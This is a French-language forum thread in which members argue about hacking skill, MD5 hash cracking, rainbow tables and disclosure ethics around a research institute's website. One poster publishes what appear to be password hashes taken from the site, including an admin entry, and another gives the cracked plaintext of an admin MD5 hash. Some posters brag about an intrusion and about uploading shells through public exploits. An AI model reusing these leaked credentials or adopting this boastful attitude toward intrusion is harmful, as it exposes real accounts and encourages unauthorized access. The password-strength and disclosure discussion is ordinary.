Comprendre un bufferOverFlow ? Ce n'est surement pas un script kiddies ou un apprenti hacker qui comprendra mieux un BoF qu'un informaticien, il faut déjà maitriser un langage de programmation, avoir des connaissances en assembleur et en architecture des machines... Bref... entre comprendre et maitriser il y a tout un monde... C'est encore une fois facile de prendre un exploit du net pour faire un bufferOverFlow.

Je ne connais pas beaucoup d'informaticiens au bled qui pourront m'éxpliquer comment marche un BoF :p


Qu'est ce qu'est une injection SQL ? Penses-tu que cela relève du miracle ? Il suffit de bien réfléchir à son code pour les éviter, de plus y'a pleins d'outils qui permettent de vérifier si son application en contient ou pas. Les Injection SQL sont traitées lors qu'on étudie les bases de données et la programmation web.

Je disais seulement cher ami ;) que quelqu'un qui étudie le SQL et son utilisation notament dans les pages php n'aurait pas tout a coup l'idée de l'injection si il n'en a pas auparavent entendu parlé ;) et ces outils dont tu parles sont utilisés par les h@ckers (script kiddies, crackers, n00b, n0b choisissez ce que vous voulez :D) pour attaquer des sites :p


Il ne faut pas prendre pour exemple les ingénieurs qui obtiennent une moitié de diplôme et qui ne s'intéressent pas à leur métier ou encore les techniciens qui se retrouvent à faire un boulot qui les dépasses.

Malheureusement la majorité gagne :(


JE NE SAIS PAS POURQUOI JE SUIS AUSSI SUSCEPTIBLE MOI HAVOC !!!?

Bah je ne sais pas mon amis :D


Ah parce que tu as pu déchiffer le mot de passe admin de la boite ? Vu les mots de passe habituellement utilisé par CERIST cela m'étonnerait que tu y soit arriver même avec des Go de rainbow tables.

Si tu parles de ça 9fcca8a6f2920f02c0b7b49b140b1d36 oui ! n'importe quel décrypteur sur le net te le donnears vu que c'est con comme mot de passe :D ou alors j'ai pas compris :confused:
Mais vu que le forum est a l'abondant (et le site aussi) même un h@cker va prendre ses jambes a son coup :D


Pour ce qui est du fichier que tu mentionnes, cela à tout l'air d'etre le contenu d'un htpasswd lequel utilise un cryptage MD5 spécifique à apache


Non je ne crois pas, plutôt un cryptage concocté par un des rares a s'intéresser a ce qu'il fait au cerist ;) .
MD5 spécifique à apache :confused:, peux-tu nous éclairer ?

un h@cker a sûrement d'autres chats a fouetter que de concevoir un shell perso, je ne dis pas que ce n'est pas préférable, mais si tu as un outil sous la main, alors vaut mieux s'en servir ! Maintenant libre a toi d'utiliser une fonction dont tu ne comprends pas le fonctionnement si tu veux arriver a tes fins !

Merci, c'est la meilleur définition d'un "Script kiddies" que j'ai entendu...au moins tu as apporté quelque chose :)

Par contre ce que j'ai pas pu faire c'est déchiffrer ça :
cip:/lWBYZtMu1IwQ
admin:aLrm37XQuIu12
anep1901:0avLGdWTspfvU

Tu confirmes....et en même temps tu me déçois, à un moment j'au cru que tu avais du potentiel.....dommage !!!

En fait ,
En tant que je suis Un Grey HAT :) j'ai fait un petit test d'un 5mn


Où est le Grey dans tous celà ? ....poster ça dans un forum n'est pas vraiment gris :)

Merci, c'est la meilleur définition d'un "Script kiddies" que j'ai entendu...au moins tu as apporté quelque chose

Je n'y peux rien si tu es mazo :D mais ravi de t'avoir aidé ;)


Tu confirmes....et en même temps tu me déçois, à un moment j'au cru que tu avais du potentiel.....dommage !!!

Le peu que j'ai me satisfait amplement :cool: je n'ai rien à prouver à personne sauf a moi même, et tant pis pour ceux à qui ça ne plaît pas :)

J'accepte ses éxcuses :D parceque c'est moi le co'n qui a laissé ma porte ouverte lol :D

Que veux-tu ? j'aime jouer a la roulette russe :p


Pour terminer le sujet (pour moi biensûr...vous faites ce que voulez), je retiens deux choses :

- Tu admet que quelqu'un te fasse du mal si tu as mal agit
- Tu aimes le risque

Je "prend note" :)

Pour terminer le sujet (pour moi biensûr...vous faites ce que voulez), je retiens deux choses :

- Tu admet que quelqu'un te fasse du mal si tu as mal agit
- Tu aimes le risque


:p Bon SecDz malgré le respect que je te dois je ne comprend rien a ta philo a la noix :p mais si j'ai bien compris:
- Le 1er point est plutôt un raisonnement naturel pour quelqu'un doté d'une conscience
- Le deuxieme point est plutôt courant chez les gens, mais ce n'est pas mon cas, ce que j'ai dis c'est juste pour plaisenter ça sert a ça les :p , :p

Pour ne pas clore le sujet, le sujet ne tourne pas autour de moi mais des gens du CERIST, alors ne t'embrouille pas camarade :D


Je "prend note" :)

Là tu me fous les j'tons camarade :confused: tu vas faire quoi ? me traquer et me dénoncer a la fameuse gendarmerie du net dont abderahime_13 a parlé :D
Non plus serieusement je crois que si j'était par exemple en Europe je ne ferais sûrement pas toutes ces conneries de kiddy :p , c'est juste qu'ici au bled tout le monde fais ce qu'il veut alors je fais pareil :p .Ne vas pas croire que je n'aime pas ma patrie, je rêve de la servire en bien mais malheureusement on m'empèche de le faire :mad: pour le moment alors je me défoule un peu :D

Je devrais y arriver merci :D


Ok j'ai compris, mais un n00b devrait avoir beaucoup d'ingeniosité pour uploader les shell sur le serveur ciblé :p en dans ce cas je crois qu'on devrait enlever un zéro et l'appeler n0b :D
Ne pas connaitre le PHP et h@cker ???? :confused: ça tient du miracle :eek:
Ben les exploits de milw0rm est compagnie servent à quoi ? il y a tout plein d'exploits permettant d'injecter du code, un shell, d'uploader des fichiers, d'obtenir des mots de passe...etc. Avec ces exploits on arrive à uploader un backdoor sur le serveur... rien de miraculeux.


Je ne connais pas beaucoup d'informaticiens au bled qui pourront m'éxpliquer comment marche un BoF :p

Mais si mais si ! Surtout qu'ici ils font beaucoup de C/C++ donc les accès mémoires ils sont sensé connaitre... pour ne parler que de ça.


Je disais seulement cher ami ;) que quelqu'un qui étudie le SQL et son utilisation notament dans les pages php n'aurait pas tout a coup l'idée de l'injection si il n'en a pas auparavent entendu parlé ;) et ces outils dont tu parles sont utilisés par les h@ckers (script kiddies, crackers, n00b, n0b choisissez ce que vous voulez :D) pour attaquer des sites :p

Pas du tout, ce sont des outils utilisé normalement principalement par les développeur et les spécialiste en sécurité, c'est comme la backtrack qui est une distribution linux spécialisée dans l'audit en sécurité à la base et non un outil de script kiddies (d'ailleurs je connais encore aucun apprenti hacker qui sait utiliser l'ensemble des outils fournis par cette distribution).

Si tu parles de ça 9fcca8a6f2920f02c0b7b49b140b1d36 oui ! n'importe quel décrypteur sur le net te le donnears vu que c'est con comme mot de passe :D ou alors j'ai pas compris :confused:
Mais vu que le forum est a l'abondant (et le site aussi) même un h@cker va prendre ses jambes a son coup :D
Oui oui je parlais bien de ce mot de passe que tu as cité. (enfin ce hash MD5)


Non je ne crois pas, plutôt un cryptage concocté par un des rares a s'intéresser a ce qu'il fait au cerist ;) .
MD5 spécifique à apache :confused:, peux-tu nous éclairer ?

Et pourtant il en a tout l'air. C'est un fichier généré avec la commande UNIX : htpasswd
Tu peux selon ton choix soit utilisé un cryptage à base de MD5 spécifique à apache (non portable sur d'autre machines) ou un cryptage basé sur le DES (fonction "crypt" qui sert aussi aux shadows) ou encore en SHA.

@HAVOC une question est ce qu'il y a des serveurs public contenant des tables rainbow très volumineux merci :)

Si tu parles de ça 9fcca8a6f2920f02c0b7b49b140b1d36 oui ! n'importe quel décrypteur sur le net te le donnears vu que c'est con comme mot de passe :D
ou alors j'ai pas compris :confused:


Hi Havoc,

Tu peux dire à ton ami de nous filer le résultat inverse de ce bash crypté en MD5 !!! ... :D , je t'attend 24H en plus :D

Salut :)

Ben les exploits de milw0rm est compagnie servent à quoi ? il y a tout plein d'exploits permettant d'injecter du code, un shell, d'uploader des fichiers, d'obtenir des mots de passe...etc. Avec ces exploits on arrive à uploader un backdoor sur le serveur... rien de miraculeux.
Je parle d'un piratage ciblé non à l'aveuglette ! dans ce cas milw0rm ne sert a rien :D

Mais si mais si ! Surtout qu'ici ils font beaucoup de C/C++ donc les accès mémoires ils sont sensé connaitre... pour ne parler que de ça.

Du C/C++ laisse moi rire :D c'est plutôt du copiage qu'ils font :cool: ou alors on vit dans deux mondes parallèles toi et moi (PS: je parle bien sûr de la majorité parceque j'en connais du bled qui rivaliserait avec les meilleurs) et puis aprés c'est pas parcequ'on maitrise le C++ qu'on peut confectionner un BoF, je parierais que la majorité n'arriveraient pas t'éxpliquer comment se fait la gestion de la mémoire au niveau le plus bas ! alors un BoF ! :D (PS: Moi même je ne pourrais pas fabriquer un BoF ni t'éxpliquer convenablement la gestion de la mémoire ;) mais je ne suis pas informaticien :D )

Pas du tout, ce sont des outils utilisé normalement principalement par les développeur et les spécialiste en sécurité, c'est comme la backtrack qui est une distribution linux spécialisée dans l'audit en sécurité à la base et non un outil de script kiddies (d'ailleurs je connais encore aucun apprenti hacker qui sait utiliser l'ensemble des outils fournis par cette distribution).
Je ne vois ce qui pourrait l'en empecher !!?

Et pourtant il en a tout l'air. C'est un fichier généré avec la commande UNIX : htpasswd
Tu peux selon ton choix soit utilisé un cryptage à base de MD5 spécifique à apache (non portable sur d'autre machines) ou un cryptage basé sur le DES (fonction "crypt" qui sert aussi aux shadows) ou encore en SHA.

Merci pour l'info ;) c'est juste que j'ai mal interprété un drole de fichier que j'ai trouvé :D

Oui oui je parlais bien de ce mot de passe que tu as cité. (enfin ce hash MD5)
Havoc tu peux dire a ton ami (puisqu'il ne veut pas me parler directement, ptêt que je suis un impie pou lui :D mais dans quelle religion, je ne sais pas :D ) qu'il aille voir par exemple par ici ==> http://www.authsecu.com/decrypter-dechiffrer-cracker-hash-md5/ :D il sera surpris par le résultat :D

Havoc tu peux dire a ton ami (puisqu'il ne veut pas me parler directement, ptêt que je suis un impie pou lui :D mais dans quelle religion, je ne sais pas :D ) qu'il aille voir par exemple par ici ==> http://www.authsecu.com/decrypter-dechiffrer-cracker-hash-md5/ :D il sera surpris par le résultat :D

En tout cas les rainbow tables de milw0rm qui sont d'habitude bien fournies n'ont pas pu venir à bout du hash MD5 du compte admin, la preuve ici : http://www.milw0rm.com/md5/list.php?start=139470

Il faut croire qu'il est plus compliqué que ça ;)

Salut :)

Havoc tu peux dire a ton ami (puisqu'il ne veut pas me parler directement, ptêt que je suis un impie pou lui :D mais dans quelle religion, je ne sais pas :D ) qu'il aille voir par exemple par ici ==> http://www.authsecu.com/decrypter-dechiffrer-cracker-hash-md5/ :D il sera surpris par le résultat :D

Bof, je suis supris ...

j'ai pensé que tu sois l'ami du Havoc, mais, apparement je me suis trompé ..
Bref, tu dois savoir une chose, on peut jamais -voir impossible- de calculer TOUT les msgs cryptés par MD5, car, et pour la seule raison, c'est que l'algorithme MD5 est basé sur une méthode de hashage pour obtenir l'emprunte numérique, mais à UN SEUL SENS ... :cool:

CTRL+d ! :D

Bof, je suis supris ...

j'ai pensé que tu sois l'ami du Havoc, mais, apparement je me suis trompé ..
Bref, tu dois savoir une chose, on peut jamais -voir impossible- de calculer TOUT les msgs cryptés par MD5, car, et pour la seule raison, c'est que l'algorithme MD5 est basé sur une méthode de hashage pour obtenir l'emprunte numérique, mais à UN SEUL SENS ... :cool:

CTRL+d ! :D

Avant tout salam,
La fonction md5 est une fonction non-inversible (si tu préfère une matrice de déterminant nul :D ) oui, mais il y'a quelques années (je ne sais pas quand éxactement) des chrcheurs japonais ont découvert des collisions dans ce mode de cryptage, ce qui en fait un mode non sûr mais néaumoin largement utilisé de nos jours, bref, le décryptage se fait (à mon avis) par des comparaisons, et le hash qu'on avait (celui de wissal) contient un mot trés répondu :D (en sois même c'est con de mettre ce mot dans un pass) et c'est pour cela que la pâte a pris :D

En tout cas les rainbow tables de milw0rm qui sont d'habitude bien fournies n'ont pas pu venir à bout du hash MD5 du compte admin, la preuve ici : http://www.milw0rm.com/md5/list.php?start=139470

Il faut croire qu'il est plus compliqué que ça ;)

Salut HAVOC;
9fcca8a6f2920f02c0b7b49b140b1d36 ===> admin2002
Il ne faut pas croire que milw0rm est le meilleur en la matière, certains gardent jalousement les propres bases et j'en connais même certains (allez voir du coté de waraxe) qui te décrypteraient n'importe quoi, et je le dis par éxpérience, il m'ont fourni des passes que tu ne peux pas imaginer décrypter, mais bien sûr ils gardent leurs scripts pour eux :D

Avant tout salam,
La fonction md5 est une fonction non-inversible (si tu préfère une matrice de déterminant nul :D ) oui, mais il y'a quelques années (je ne sais pas quand éxactement) des chrcheurs japonais ont découvert des collisions dans ce mode de cryptage, ce qui en fait un mode non sûr mais néaumoin largement utilisé de nos jours, bref, le décryptage se fait (à mon avis) par des comparaisons, et le hash qu'on avait (celui de wissal) contient un mot trés répondu :D (en sois même c'est con de mettre ce mot dans un pass) et c'est pour cela que la pâte a pris :D
Premièrement si khouna le "Cracker" (plutot script kiddie, va voir le message que j'ai écris la dernière fois à propos de toi http://www.forumdz.com/showpost.php?p=30546&postcount=69 )

Elmouhim, il y a déjà dans cette quote quelques erreurs, c'est des chinois et non des japonais, et c'était en 2004 sous le titre "Donne moi un hash je te donnerai un fichier qui lui correspond"

Maintenant pour prouver que tu es un ignorant, soit en informatique (entre autre les fonctions de hashage) soit en Français (je laisse le benefice du doute) t'as dis :
"hash qu'on avait (celui de wissal) contient un mot trés répondu :D"
en utilisant le mot "contient" tu t'es "self pwned" comme on dit chez nous.
pourquoi? je te laisse chercher...

aya salam :)

Premièrement si khouna le "Cracker" (plutot script kiddie, va voir le message que j'ai écris la dernière fois à propos de toi http://www.forumdz.com/showpost.php?p=30546&postcount=69 )

Wallah je ne sais pas pourquoi vous êtes une majorité à être susceptible !! Ou alors c'est moi ! Qu'ai-je donc fais pour mériter ça :confused: Mais bon, comme j'ai un bon fond :p je vous pardonne à tous ;)


Elmouhim, il y a déjà dans cette quote quelques erreurs, c'est des chinois et non des japonais, et c'était en 2004 sous le titre "Donne moi un hash je te donnerai un fichier qui lui correspond"
Bah tu sais ils parlent tous chinois :D (mais tu pourrais comme même me réctifier en étant gentil :cool:)



Maintenant pour prouver que tu es un ignorant,

Là je trouve comme même que c'est petit et mésquin même de ta part :mad:, parceque je ne suis pas prétentieux et je n'ai jamais dis que je sais tout, c'est plutôt toi qui en donne l'air, bref l'ignorant à mon avis est celui qui crois savoir tout ....


soit en informatique (entre autre les fonctions de hashage)

J'ai déja dis que je ne suis pas dutout informaticien, je ne l'ai jamais étudié nul part sauf sur mon ecran, alors tu peux comme même laisser passer quelques fautes d'un autodidacte


soit en Français (je laisse le benefice du doute)

On n'a pas tous le word a coté de nous :D


t'as dis :
"hash qu'on avait (celui de wissal) contient un mot trés répondu :D"
en utilisant le mot "contient" tu t'es "self pwned" comme on dit chez nous.
pourquoi? je te laisse chercher...
Je ne comprends pas ce que j'ai dis qui pourrait se retourner contre moi :confused: mais bon, je suis sûr que tu vas le dire a l'IGNORANT :D


aya salam :)
Ca se dit en premier cher ami :cool:

Pour finir c'est la plus désagréable conversation que j'ai eu sur le net depuis que j'ai appris a taper sur un clavier :( tu devrais ptêt revoir ton coté sociable (si jamais tu en as un :D) et si tu as quelquechose a me dire ou une dent contre moi dis le carément n'ais pas peur :cool:

tu devrais ptêt revoir ton coté sociable (si jamais tu en as un
J'en ai pas désolé :)

sinon, pour le mot "contient" je vais laisser quelqu'un d'autre te l'expliquer,, si après quelques jours personne ne répond je serai vraiment déçu

aya ya djma3 il a dit "contient un mot" ;)

J'en ai pas désolé :)

sinon, pour le mot "contient" je vais laisser quelqu'un d'autre te l'expliquer,, si après quelques jours personne ne répond je serai vraiment déçu

aya ya djma3 il a dit "contient un mot" ;)

Bof si tu veux dire que le hash en lui même ne contient pas d'information sur le mot de passe mais que ce n'est qu'une signature je crois que tu t'emportes pour rien :D c'était juste un abus de language de ma part :cool: si tu veux je reformule

... et le hash qu'on avait (celui de wissal) est celui d'un mot qui contient un autre mot trés répondu ....

Si c'était ça mon frère tu fais des vagues pour rien :p

Bof si tu veux dire que le hash en lui même ne contient pas d'information sur le mot de passe mais que ce n'est qu'une signature je crois que tu t'emportes pour rien :D c'était juste un abus de language de ma part :cool: si tu veux je reformule



Si c'était ça mon frère tu fais des vagues pour rien :p

mais non, ça n'a rien à voir, cherche, cherche ;)

Ce qu'il veut dire, c'est que tu utilises un mot de passe composé de mots communs n'est pas dangereux en soit car le hashage MD5 n'est "crackable" qu'avec trois méthodes :
- Le bruteforce à l'aide d'un dico : Dans ce cas on se limite à des mots simples, comme par exemple : maison, chat, azerty...etc.
- Le bruteforce simple (si j'ose dire) : Cette méthode consiste à tout simplement essayer toutes les possibilités possibles... autant dire que si le mot de passe est long il faudra des années pour le trouver (voir des siècles ou plus).
- Le bruteforce à l'aide de rainbow tables : Similaire au brute force simple sauf qu'on utilise des tables de hash pré-calculés, donc plus on a des tables riches (grosses) plus on a de chances de trouver le mot de passe... cette méthode est aussi plus rapide que le brute force simple.

Les mots de passe du genre : LeDimancheJeVaisAlaPêche sont à mon avis sûr même si composé de mots du dico.

Personnellement, je connais des sites où l'on peut télécharger des Go de rainbow table pour les utiliser avec un soft de crackage ou créer un serveur. Il y a même le site du projet rainbow table.

Ce qu'il veut dire, c'est que tu utilises un mot de passe composé de mots communs n'est pas dangereux en soit car le hashage MD5 n'est "crackable" qu'avec trois méthodes :
- Le bruteforce à l'aide d'un dico : Dans ce cas on se limite à des mots simples, comme par exemple : maison, chat, azerty...etc.
- Le bruteforce simple (si j'ose dire) : Cette méthode consiste à tout simplement essayer toutes les possibilités possibles... autant dire que si le mot de passe est long il faudra des années pour le trouver (voir des siècles ou plus).
- Le bruteforce à l'aide de rainbow tables : Similaire au brute force simple sauf qu'on utilise des tables de hash pré-calculés, donc plus on a des tables riches (grosses) plus on a de chances de trouver le mot de passe... cette méthode est aussi plus rapide que le brute force simple.

Les mots de passe du genre : LeDimancheJeVaisAlaPêche sont à mon avis sûr même si composé de mots du dico.

Personnellement, je connais des sites où l'on peut télécharger des Go de rainbow table pour les utiliser avec un soft de crackage ou créer un serveur. Il y a même le site du projet rainbow table.

Exacte donc le fait que le pwd contient "admin" ou je ne sais quoi n'est aucunement un problème de sécurité.

Il y a même un projet de génération de Rainbow table en distribué (google) qui est très bien, mais le problème c'est que le soft n'est dispo que pour Windows, il aurait était très bien s'il était dispo pour linux vu que plusieurs serveur pouront y participé :)

Ce qu'il veut dire, c'est que tu utilises un mot de passe composé de mots communs n'est pas dangereux en soit car le hashage MD5 n'est "crackable" qu'avec trois méthodes :
- Le bruteforce à l'aide d'un dico : Dans ce cas on se limite à des mots simples, comme par exemple : maison, chat, azerty...etc.
- Le bruteforce simple (si j'ose dire) : Cette méthode consiste à tout simplement essayer toutes les possibilités possibles... autant dire que si le mot de passe est long il faudra des années pour le trouver (voir des siècles ou plus).
- Le bruteforce à l'aide de rainbow tables : Similaire au brute force simple sauf qu'on utilise des tables de hash pré-calculés, donc plus on a des tables riches (grosses) plus on a de chances de trouver le mot de passe... cette méthode est aussi plus rapide que le brute force simple.

Les mots de passe du genre : LeDimancheJeVaisAlaPêche sont à mon avis sûr même si composé de mots du dico.

Personnellement, je connais des sites où l'on peut télécharger des Go de rainbow table pour les utiliser avec un soft de crackage ou créer un serveur. Il y a même le site du projet rainbow table.

Hé ben comme ça c'est mieux, pour tout te dire HAVOC je ne connais pas le fonctionnement du md5, j'ai peut être raisoné trop terre-à-terre et l'autre là ne m'a pas raté !

Exacte donc le fait que le pwd contient "admin" ou je ne sais quoi n'est aucunement un problème de sécurité.

Et pourquoi faire tout ce tapage !? t'aurais pu le dire tout de suite ! et éviter de me traiter d'ignorant, t'es vraiment (avce tout le respect que je te dois) qu'un prétentieux :D

Maintenant pour me defendre un peu voilà comment je vois les choses:
Si j'avais un dico et si je voulais cracker un pass, je mettrais surement tout les passes adminxxxxxxxx dans ce dico, ça représente quoi ? 1 milliard de mots en plus, si j'ai un bonne machine et si je suis déterminé ça me prendra ptêt 15~20 jours :D (et puis je ne suis pas obligé de demarrer avec 8 chiffres) et dans ce cas je crois vraiment que c'est bête de mettre un mot aussi familier qu'admin dans le passe même si associé à un chiffre aléatoire !

Et pourquoi faire tout ce tapage !? t'aurais pu le dire tout de suite ! et éviter de me traiter d'ignorant, t'es vraiment (avce tout le respect que je te dois) qu'un prétentieux :D

Mais je le suis, j'ai pas dis le contraire ;)

Mais je le suis, j'ai pas dis le contraire ;)

C'est noté :cool:

Maintenant pour me defendre un peu voilà comment je vois les choses:
Si j'avais un dico et si je voulais cracker un pass, je mettrais surement tout les passes adminxxxxxxxx dans ce dico, ça représente quoi ? 1 milliard de mots en plus, si j'ai un bonne machine et si je suis déterminé ça me prendra ptêt 15~20 jours :D (et puis je ne suis pas obligé de demarrer avec 8 chiffres) et dans ce cas je crois vraiment que c'est bête de mettre un mot aussi familier qu'admin dans le passe même si associé à un chiffre aléatoire !

Dans cette optique, il faudrait alors un mot de passe de 32 caractères pour être tranquille !
Personnellement je me contente de mots de passe entre 10 et 12 caractères mais incluant des caractères spéciaux ce qui rend la tache plus difficile (surtout que de nombreux logiciels ne les inclus même pas dans leurs recherches).

PS/ En plus du temps que te prendras la comparaisons des HASH avec ta méthode, il faudra aussi ajouter le temps que te prendra la saisie de 1 milliards de mots ;):D

Exemple de mot de passe sécurisé avec un chiffre, une majuscule et un caractère spécial :

1blague@2Balles

Et surtout évitez de mettre vos dates de naissance en tant que mots de passe.

Salutations amicales

PS/ En plus du temps que te prendras la comparaisons des HASH avec ta méthode, il faudra aussi ajouter le temps que te prendra la saisie de 1 milliards de mots ;):D
Qui a dit qu'il faudrait une saisie ????! :confused:, tu prends le hash, tu fais une boucle qui génère les hash des mots de ton dico et les compare :D
Pour ce qui est de générer les adminxxxxxx, bah un script peut aussi te faire ça :cool:

Qui a dit qu'il faudrait une saisie ????! :confused:, tu prends le hash, tu fais une boucle qui génère les hash des mots de ton dico et les compare :D
Pour ce qui est de générer les adminxxxxxx, bah un script peut aussi te faire ça :cool:

Oui mais la génération du fichier contenant les adminxxxxxx prendra elle même du temps. Si c'est un dico avec des mots variés sa conception prendra encore plus de temps (heureusement on peut en trouver un peu partout sur le net).
Bref... tout ça est beaucoup plus lent que la méthode avec les rainbow tables.

Oui mais la génération du fichier contenant les adminxxxxxx prendra elle même du temps. Si c'est un dico avec des mots variés sa conception prendra encore plus de temps (heureusement on peut en trouver un peu partout sur le net).
Bref... tout ça est beaucoup plus lent que la méthode avec les rainbow tables.

Je veux bien te croire, c'était juste pour ma défense :D

Vaut mieux fermer ce thread (et effacer quelque poste autrement vous allez avoir un probleme avec quelque chieur du site mi-attaqué vu qu'en Aglérie on ne rencontre que des problemes), vous vous lancez dans les bla bla de la philosophie, je pense que ca n'a rien a voir avec le titre de la discution..

C'est une discution qui ressemble un petit peu entre les terroristes et l'etat chacun d'eux pense qu'il fait du bien .. mais d'un autre point de vu tous les deux sont des meurtrier

un hacker pense avoir le droit d'accéder aux systemes des autres parce qu'il est plus intelligent que les admins, par contre les admins pensent qu'ils sont fort dans le domaine de la sécurité et commence a faire chier les hackers ... bref les deux sont des imbéciles a mon avis (excuser moi pour le terme) parce que la sécurité n'est pas a 100% et puis le savoir humain ne dépasse meme pas une goute d'eau dans l'ocean .. et si chacun de nous s'occupe a evoluer son niveau dans la matiere dont il parle n'est pas mieux ?

A mon avis un hacker n'est qu'un admin non officiel .. (laissons tomber les définitions des anciens siecle svp)

Piratez ce que vous pouvez pirater et protéger ce que vous pouvez protéger .. et que le plus fort gagne.

Avec tous mes respects mes chers freres

Merci

Rien d'autre a dire

Vaut mieux fermer ce thread

Entièrement d'accord

bref les deux sont des imbéciles a mon avis (excuser moi pour le terme)

Tu as choisi quoi toi ?

A mon avis un hacker n'est qu'un admin non officiel .. (laissons tomber les définitions des anciens siecle svp)

Je laisserais volentier tomber "les définitions des anciens siècles"...mais pour quelque chose de plus consistant, et à mon avis, ta définition et...disons "préhistorique".

Piratez ce que vous pouvez pirater et protéger ce que vous pouvez protéger .. et que le plus fort gagne.)

la jungle quoi !

Avec tous mes respects mes chers freres

Ca ne colle pas avec le reste du message !


Merci

De quoi ? d'avoir traiter tout le monde d'imbécile ?!!!

Je pense d'abord qu'il faut connaitre le rôle de chaque spécialiste dans une infrastructure, il y a les administrateurs réseaux, administrateurs système, les webmasters, les utilisateurs lamda....etc.
Il est faux de remettre la sécurisation d'un site sur le dos d'un hypothétique administrateur.

Vaut mieux fermer ce thread (et effacer quelque poste autrement vous allez avoir un probleme avec quelque chieur du site mi-attaqué vu qu'en Aglérie on ne rencontre que des problemes), vous vous lancez dans les bla bla de la philosophie, je pense que ca n'a rien a voir avec le titre de la discution..

C'est une discution qui ressemble un petit peu entre les terroristes et l'etat chacun d'eux pense qu'il fait du bien .. mais d'un autre point de vu tous les deux sont des meurtrier

un hacker pense avoir le droit d'accéder aux systemes des autres parce qu'il est plus intelligent que les admins, par contre les admins pensent qu'ils sont fort dans le domaine de la sécurité et commence a faire chier les hackers ... bref les deux sont des imbéciles a mon avis (excuser moi pour le terme) parce que la sécurité n'est pas a 100% et puis le savoir humain ne dépasse meme pas une goute d'eau dans l'ocean .. et si chacun de nous s'occupe a evoluer son niveau dans la matiere dont il parle n'est pas mieux ?

A mon avis un hacker n'est qu'un admin non officiel .. (laissons tomber les définitions des anciens siecle svp)

Piratez ce que vous pouvez pirater et protéger ce que vous pouvez protéger .. et que le plus fort gagne.

Avec tous mes respects mes chers freres

Merci
Allah yahafdak :D


Citation:
Envoyé par Intranet Voir le message
Vaut mieux fermer ce thread
Entièrement d'accord

Alors là cher ami je crois que tu es en contradiction avec toi-même, dis moi ce que tu espères en publiant des pseudo-failles sur ton blog? hein? y'aura surement quelqu'un qui essaiera d'utiliser tes découvertes avec de mauvaises intentions (enfin dans ton repère à toi), alors excuse moi mais si un site se fait pirater c'est comme si tu l'avais piraté toi même! Si tu croyais vraiment a ton honnêteté tu alerterais l'admin du site et c'est tout! Je crois que tu as une irrésistible envie de dire " voila! j'ai trouvé une faille" mais que tu cherche secrètement a ce que ceux qui te lisent te remercient parcequ'ils auront pu piraté le site en question grâce a toi :D
PS: puisque c'est devenu une tradition Avec tous mes respects mes chers freres

Allah yahafdak :D


Alors là cher ami je crois que tu es en contradiction avec toi-même, dis moi ce que tu espères en publiant des pseudo-failles sur ton blog? hein? y'aura surement quelqu'un qui essaiera d'utiliser tes découvertes avec de mauvaises intentions (enfin dans ton repère à toi), alors excuse moi mais si un site se fait pirater c'est comme si tu l'avais piraté toi même! Si tu croyais vraiment a ton honnêteté tu alerterais l'admin du site et c'est tout! Je crois que tu as une irrésistible envie de dire " voila! j'ai trouvé une faille" mais que tu cherche secrètement a ce que ceux qui te lisent te remercient parcequ'ils auront pu piraté le site en question grâce a toi :D
PS: puisque c'est devenu une tradition Avec tous mes respects mes chers freres

Au contraire, là est toute la différence ! Notre ami trouve une faille, il la publie, l'explique, la commente ! Je pense même qu'il prend la peine de contacter les admin (et comme moi il ne doit jamais avoir de réponse).
Sa façon de faire est non seulement légale mais elle est surtout plus utile qu'une défacement idiot qui perturbe le fonctionnement d'un site sans pour autant apporter réellement des solutions ou des informations concrètes aux responsables du site hacké.

De plus, il faut du courage pour publier des articles dans un blog parce que un blog de part son fonctionnement permet à n'importe qui d'intervenir et de donner son avis, que cela soit pour exprimer un avis opposé ou corriger des propos techniques.

Au contraire, là est toute la différence ! Notre ami trouve une faille, il la publie, l'explique, la commente ! Je pense même qu'il prend la peine de contacter les admin (et comme moi il ne doit jamais avoir de réponse).
Sa façon de faire est non seulement légale mais elle est surtout plus utile qu'une défacement idiot qui perturbe le fonctionnement d'un site sans pour autant apporter réellement des solutions ou des informations concrètes aux responsables du site hacké.

De plus, il faut du courage pour publier des articles dans un blog parce que un blog de part son fonctionnement permet à n'importe qui d'intervenir et de donner son avis, que cela soit pour exprimer un avis opposé ou corriger des propos techniques.

Désolé mais je ne suis pas du tout d'accord avec toi, a mon avis il ne voulait pas aider les administrateur mais par contre dire a tout le monde que les admins de wi*** ne font pas leurs jobs dans la matiere de la securité informatique, on peut le remarquer en lisant son article .. bref

Je trouve qu'il a raison de le dire mais par contre s'il voulait devenir un bon gars, il ne devrait pas fournir des informations sur la faille/les failles du site en question, parce que cela donne des idées noirs a ceux qui voulent faire des dégats !

Il a le droit de dire ce qu'il veut dans son blog, mais personnelement je le considere comme un pirate aussi parce qu'il avait fournit des informations sur la faille tout simplement.

Et en ce qui concerne le message de SecDz je trouve que mon message ne vaut pas la peine d'etre analyser comme ça mais par contre j'ai quelques réponses qui peuvent te satisfaire :)

- Moi j'ai choisi d'etre un admin qui ne se moque pas de l'intelligence des hackers, et un hacker qui ne defface pas et montre aux admins qu'ils ne sont pas plus fort que les autres

- Chacun son point de vu, je ne peux pas t'obliger d'aimer ma définition lol

- Oui c'est la jungle :)

- "Avec tous mes respects mes chers frere" on doit toujours respecter ceux a qui on s'adresse même si on n'est pas d'accord avec eux... tu devrai le savoir amigo ! sauf si t'as un coeur noir :eek: lol

- "Merci" <---> De quoi ? d'avoir traiter tout le monde d'imbécile ?!!!
N'analyse pas comme quelqu'un qui utilise 1% de son cerveau t'es plus intelligent que ça et je le sais :confused: :p

Merci pour la lecture de mon message jusqu'a la fin

PS: Ce n'est qu'une discution ;)

Désolé mais je ne suis pas du tout d'accord avec toi, a mon avis il ne voulait pas aider les administrateur mais par contre dire a tout le monde que les admins de wi*** ne font pas leurs jobs dans la matiere de la securité informatique, on peut le remarquer en lisant son article .. bref

Je trouve qu'il a raison de le dire mais par contre s'il voulait devenir un bon gars, il ne devrait pas fournir des informations sur la faille/les failles du site en question, parce que cela donne des idées noirs a ceux qui voulent faire des dégats !

Il a le droit de dire ce qu'il veut dans son blog, mais personnelement je le considere comme un pirate aussi parce qu'il avait fournit des informations sur la faille tout simplement.

Et en ce qui concerne le message de SecDz je trouve que mon message ne vaut pas la peine d'etre analyser comme ça mais par contre j'ai quelques réponses qui peuvent te satisfaire :)

- Moi j'ai choisi d'etre un admin qui ne se moque pas de l'intelligence des hackers, et un hacker qui ne defface pas et montre aux admins qu'ils ne sont pas plus fort que les autres

- Chacun son point de vu, je ne peux pas t'obliger d'aimer ma définition lol

- Oui c'est la jungle :)

